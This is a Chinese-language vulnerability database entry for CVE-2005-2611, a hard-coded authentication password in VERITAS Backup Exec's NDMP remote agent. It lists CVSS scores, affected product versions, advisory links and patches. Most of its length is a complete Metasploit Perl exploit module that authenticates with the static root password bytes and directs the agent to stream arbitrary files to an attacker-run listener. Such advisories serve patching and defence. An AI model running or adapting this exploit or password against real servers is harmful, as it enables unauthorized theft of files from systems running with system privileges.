CVE-2005-2611
CVSS10.0
发布时间 :2005-08-17 00:00:00
修订时间 :2011-03-07 21:24:46
NMCOE    

[原文]VERITAS Backup Exec for Windows Servers 8.6 through 10.0, Backup Exec for NetWare Servers 9.0 and 9.1, and NetBackup for NetWare Media Server Option 4.5 through 5.1 uses a static password during authentication from the NDMP agent to the server, which allows remote attackers to read and write arbitrary files with the backup server.


[CNNVD]VERITAS Backup Exec Remote Agent任意文件下载漏洞(CNNVD-200508-183)

        VERITAS Backup Exec Remote Agent是一款支持网络数据管理协议(NDMP)的数据备份和恢复解决方案。
        VERITAS Backup Exec Remote Agent使用硬编码的管理认证凭据(root口令),远程攻击者可能利用此漏洞访问系统文件。知道了这些凭据且访问了Remote Agent的攻击者可以从有漏洞的系统检索任意文件。Remote Agent是以系统权限运行的。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp1
cpe:/a:symantec_veritas:backup_exec:windows_servers_10.0_rev._5520
cpe:/a:symantec_veritas:backup_exec:windows_servers_10.0_rev._5484_sp1
cpe:/a:symantec_veritas:backup_exec_remote_agent:windows_server
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1152_.4
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp3
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp2
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4172
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp5
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp8
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0_rev._4454
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1151_.1
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0_rev._4367
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1127_.1
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp4
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.306
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.307
cpe:/a:symantec_veritas:backup_exec_remote_agent:netware_server
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp6
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp8
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp4
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp2
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.1_mp2
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp6
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp5
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp2
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0_rev._4367_sp1
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0_rev._4454_sp1
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp5
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4019
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4174
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.0_mp1
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.1_mp1
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4202
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1067_.2
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp7
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1067_.3
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1156
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.0.4170
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp1
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.0
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.1
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1152
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp3
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.1_rev._4691_sp2
cpe:/a:symantec_veritas:backup_exec:windows_servers_9.1_rev._4691
cpe:/a:symantec_veritas:backup_exec:windows_servers_10.0_rev._5484
cpe:/a:symantec_veritas:backup_exec:netware_servers_9.1.1154
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_fp7
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.1
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp3
cpe:/a:symantec_veritas:netbackup:netware_media_servers_4.5_mp4
cpe:/a:symantec_veritas:backup_exec:windows_servers_8.6
cpe:/a:symantec_veritas:netbackup:netware_media_servers_5.1_mp3
cpe:/a:symantec_veritas:backup_exec_remote_agent:unix_linux_server

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2611
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2611
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-183
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/378957
(VENDOR_ADVISORY)  CERT-VN  VU#378957
http://www.us-cert.gov/cas/techalerts/TA05-224A.html
(VENDOR_ADVISORY)  CERT  TA05-224A
http://xforce.iss.net/xforce/xfdb/21793
(PATCH)  XF  backupexec-ndmp-gain-access(21793)
http://securitytracker.com/id?1014662
(VENDOR_ADVISORY)  SECTRACK  1014662
http://securityresponse.symantec.com/avcenter/security/Content/2005.08.12b.html
(VENDOR_ADVISORY)  CONFIRM  http://securityresponse.symantec.com/avcenter/security/Content/2005.08.12b.html
http://secunia.com/advisories/16403
(VENDOR_ADVISORY)  SECUNIA  16403
http://www.vupen.com/english/advisories/2005/1387
(UNKNOWN)  VUPEN  ADV-2005-1387
http://www.securityfocus.com/bid/14551
(UNKNOWN)  BID  14551

- 漏洞信息

VERITAS Backup Exec Remote Agent任意文件下载漏洞
危急 访问验证错误
2005-08-17 00:00:00 2007-08-20 00:00:00
远程  
        VERITAS Backup Exec Remote Agent是一款支持网络数据管理协议(NDMP)的数据备份和恢复解决方案。
        VERITAS Backup Exec Remote Agent使用硬编码的管理认证凭据(root口令),远程攻击者可能利用此漏洞访问系统文件。知道了这些凭据且访问了Remote Agent的攻击者可以从有漏洞的系统检索任意文件。Remote Agent是以系统权限运行的。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://support.veritas.com/docs/278434
        http://support.veritas.com/docs/278431
        http://support.veritas.com/docs/278430

- 漏洞信息 (1147)

Veritas Backup Exec Remote File Access Exploit (windows) (EDBID:1147)
windows remote
2005-08-11 Verified
10000 n/a
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

##
# Original code written by <CENSORED> and ported to the Framework by HDM
##

package Msf::Exploit::backupexec_dump;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use IO::Socket;
use IO::Select;

my $advanced = { };

my $info =
  {
	'Name'  	=> 'Veritas Backup Exec Windows Remote File Access',
	'Version'  	=> '$Revision: 1.3 $',
	'Authors' 	=> [ 'anonymous' ],
	'Arch'  	=> [ ],
	'OS'    	=> [ ],

	'UserOpts'	=>
	  {
		'RHOST' => [1, 'ADDR', 'The target IP address'],
		'RPORT' => [1, 'PORT', 'The target NDMP port', 10000],
		'RPATH' => [0, 'DATA', 'The remote file path to obtain'],
		
		'LHOST' => [1, 'ADDR', 'The local IP address', '0.0.0.0'],
		'LPORT' => [1, 'PORT', 'The local listner port', 44444],
		'LPATH' => [0, 'DATA', 'The local backup file path'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
	This module abuses a logic flaw in the Backup Exec Windows Agent to download
arbitrary files from the system. This flaw was found by someone who wishes to
remain anonymous and affects all known versions of the Backup Exec Windows Agent. The 
output file is in 'MTF' format, which can be extracted by the 'NTKBUp' program 
listed in the references section.
}),

	'Refs' =>
	  [
	  	['BID', '14551'],
		['URL', 'http://www.fpns.net/willy/msbksrc.lzh'],
		# ['URL', 'http://metasploit.com/tools/msbksrc.tar.gz'],
	  ],

	'DefaultTarget' => 0,
	'Targets' =>
	  [
		['Veritas Remote File Access'],
	  ],

	'Keys' => ['veritas'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self        = shift;
	my $remote_host = $self->GetVar('RHOST');
	my $remote_port = $self->GetVar('RPORT');

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $remote_host,
		'PeerPort'  => $remote_port,
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ( $s->IsError ) {
		$self->PrintLine( '[*] Error connecting to Veritas agent: ' . $s->GetError );
		return $self->CheckCode('Connect');
	}

	my $res;
	my $pkt;
	
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive greeting from the agent');
		$s->Close;
		return $self->CheckCode('Unknown');
	}

	my $username = "root";
	my $password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"; 

	# Create the CONNECT_CLIENT_AUTH request
	$pkt =
	  pack('N', 1).
	  pack('N', time()).
	  pack('N', 0).
	  pack('N', 0x0901).
	  pack('N', 0).
	  pack('N', 0).
	  pack('N', 2).
	  pack('N', length($username)).
	  $username.
	  $password;

	$self->PrintLine( "[*] Sending magic authentication request...");
	
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	$s->Close;
	
	if (! $res) {
		$self->PrintLine('[*] Did not receive authentication response');
		return $self->CheckCode('Safe');	
	}

	my @words = unpack('N*', $res);
	
	if (
		$words[2] == 1 && 
		$words[3] == 0x0901 &&
	 	$words[5] == 0 &&
	  	$words[6] == 0
	   ) {
		$self->PrintLine('[*] This system appears to be vulnerable');
		return $self->CheckCode('Appears');
	}
	
	$self->PrintLine('[*] This system does not appear to be vulnerable');
	return $self->CheckCode('Safe');
}

sub Exploit {
	my $self        = shift;
	my $remote_host = $self->GetVar('RHOST');
	my $remote_port = $self->GetVar('RPORT');
	my $remote_path = $self->GetVar('RPATH');

	my $local_host  = $self->GetVar('LHOST');
	my $local_port  = $self->GetVar('LPORT');
	my $local_path  = $self->GetVar('LPATH');
	
	
	if (! $local_path) {
		$self->PrintLine("[*] Please specify a local file name for the LPATH option");
		return;
	}

	if (! $remote_path) {
		$self->PrintLine("[*] Please specify a remote file path for the RPATH option");
		return;
	}
		
	$self->PrintLine( "[*] Attempting to retrieve $remote_path...");

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $remote_host,
		'PeerPort'  => $remote_port,
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ( $s->IsError ) {
		$self->PrintLine( '[*] Error connecting to Veritas agent: ' . $s->GetError );
		return;
	}

	my $res;
	my $pkt;
	
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive greeting from the agent');
		$s->Close;
		return;
	}

	my $username = "root";
	my $password = "\xb4\xb8\x0f\x26\x20\x5c\x42\x34\x03\xfc\xae\xee\x8f\x91\x3d\x6f"; 

	# Create the CONNECT_CLIENT_AUTH request
	$pkt =
	  pack('N', 1).
	  pack('N', time()).
	  pack('N', 0).
	  pack('N', 0x0901).
	  pack('N', 0).
	  pack('N', 0).
	  pack('N', 2).
	  pack('N', length($username)).
	  $username.
	  $password;

	$self->PrintLine( "[*] Sending magic authentication request...");
	
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive authentication response');
		return;
	}

	$self->PrintLine("[*] Starting the data connection listener on $local_port...");
	my $l = IO::Socket::INET->new
	  (
		'LocalPort' => $local_port,
		'Proto'     => 'tcp',
		'ReuseAddr' => 1,
		'Listen'    => 5,
		'Blocking'  => 0,
	  );
	
	if (! $l) {
		$self->PrintLine("[*] Failed to start the listener: $!");
		return;
	}
	
	my $sel = IO::Select->new($l);
	
	if ($local_host eq "0.0.0.0") {
		$local_host = $s->Socket->sockhost;
	}
	
	# Create the DATA_CONNECT request
	$pkt =
		pack('NNNNNNN',
			3,
			0,
			0,
			0x040a,
			0,
			0,
			1
		).
		gethostbyname($local_host).
		pack('N', $local_port);
		
	$self->PrintLine("[*] Directing the server to $local_host:$local_port...");
	
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive data connect response');
		return;
	}

	$self->PrintLine("[*] Waiting 15 seconds for the agent to connect...");
	my @rdy = $sel->can_read(15);
	if (! @rdy) {
		$self->PrintLine("[*] No connection received from the agent :-(");
		return;
	}
	
	my $cli = $l->accept();
	if (! $cli) {
		$self->PrintLine("[*] Encountered an error accepting the connection: $!");
		return;
	}
	
	my $d = Msf::Socket::Tcp->new_from_socket($cli);
	
	$self->PrintLine("[*] Connection received from ".$d->PeerAddr." :-)");
	
	# Create the MOVER_SET_RECORD_SIZE request
	$pkt= 
		pack('NNNNNNN',
			4,
			0,
			0,
			0x0a08,
			0,
			0,
			0x8000,
		);
		
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive mover set response');
		return;
	}

	# The environment needed to perform the actual backup
	my %define_env =
	(
		'USERNAME'                => '',
		'BU_EXCLUDE_ACTIVE_FILES' => "0",
		'FILESYSTEM'              => "\"\\\\$remote_host\\$remote_path\",v0,t0,l0,n0,f0",
	);

	# Create the DATA_START_BACKUP request
	$pkt =
		pack('NNNNNNN',
			5,
			0,
			0,
			0x0401,
			0,
			0,
			4,
		).
		"dump".
		pack("N", scalar(keys %define_env));
	
	foreach my $var (keys %define_env) {
		
		$pkt .= pack("N", length($var));
		$pkt .= $var;
		if (length($var) % 4) {
			$pkt .= "\x00" x (4 - (length($var) % 4));
		}
		
		$pkt .= pack("N", length($define_env{$var}));
		$pkt .= $define_env{$var};
		if (length($define_env{$var}) % 4) {
			$pkt .= "\x00" x (4 - (length($define_env{$var}) % 4));
		}
	}	

	substr($pkt, -1, 1) = "\x01";
	
	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive backup start response');
		return;
	}

	# Create the GET_ENV request
	$pkt =
		pack('NNNNNN',
			5,
			0,
			0,
			0x4004,
			0,
			0,
		);

	$self->AgentSend($s, $pkt);
	$res = $self->AgentRead($s);
	if (! $res) {
		$self->PrintLine('[*] Did not receive get env response');
		return;
	}

	if (! open(TMP, ">". $local_path)) {
		$self->PrintLine("[*] Could not open local file for writing: $!");
		return;
	}
	
	my $data;
	do 
	{
		$data = $d->Recv(524288, 10);
		if ($data) {
			$self->PrintLine("[*] Obtained ".length($data)." bytes from the agent");
			print TMP $data;
		}
		else {
			$self->PrintLine("[*] Reached the end of the backup data");
		}
		
	} while ($data);
	close(TMP);
			
	return;
};

sub AgentRead {
	my $self = shift;
	my $sock = shift;
	my $rlen = $sock->Recv(4, 10);
	return if ! $rlen;
	
	my $plen = unpack('N', $rlen);
	return if ! $plen;
	
	my $data = $sock->Recv($plen & 0x7fffffff, 10);
	return $data;
}

sub AgentSend {
	my $self = shift;
	my $sock = shift;
	my $data = shift;
	return if ! $data;
	return $sock->Send(pack('N', 0x80000000 + length($data)) . $data);
}

1;

# milw0rm.com [2005-08-11]
		

- 漏洞信息

18695
VERITAS Backup Exec Remote Agent Static Password Arbitrary File Download
Remote / Network Access Authentication Management
Loss of Confidentiality
Exploit Public

- 漏洞描述

Veritas Backup Exec for Windows Servers contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote user sends a CONNECT_CLIENT_AUTH request with a hardcoded password value to trigger the flaw. If successful, the flaw will disclose arbitrary files that are accessible via the Windows system account, resulting in a loss of confidentiality.

- 时间线

2005-08-12 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue for the Backup Exec Windows Server 8.6 version. For all effected versions, it is possible to correct the flaw by implementing the following workaround(s): Block external access to the service (TCP port 10000) at the network perimeter For Backup Exec for Windows Servers 9.0, 9.1, & 10.0, Backup Exec for Netware Servers 9.1, and Netbackup for Netware Media Servers Option 4.5, 4.5 FP, 5.0, & 5.1, Veritas has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站